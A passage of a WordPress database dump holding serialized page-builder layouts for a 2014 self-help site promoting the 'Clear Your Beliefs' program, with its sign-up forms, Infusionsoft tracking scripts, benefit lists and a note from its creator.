post_status="any"]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1267, 1738, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:725px; height:420px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:585:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8" padding="0"]\n\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:873:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -33px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:659:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -20px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1362, 1809, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:1505:"<p>[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -30px; margin-top: 15px;"><br /> <img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><p><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><br /> <input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><br /> <input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2157:"<p>[su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><form class="infusion-form nd-form-1" style="position: relative; top: 10px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><p><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></p><form class="infusion-form nd-form-1" style="position: relative; bottom: -2px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> <br /><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div><p> </p></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1208:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><br><br><br><br>\n\n<form class="infusion-form rd-form-1" style="position: relative; " accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1360, 1807, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:127:"http://pdl.vimeocdn.com/16811/544/307601254.mp4?token2=1416450601_9d98a208a80cfdef258e7d4117c15622&aksessionid=e225207db7d39688";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"0";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1498:"<p>[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><p><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><br /> <input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><br /> <input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2157:"<p>[su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><form class="infusion-form nd-form-1" style="position: relative; top: 10px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><p><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></p><form class="infusion-form nd-form-1" style="position: relative; bottom: -2px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> <br /><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div><p> </p></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1192:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" style="position: relative; " accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting 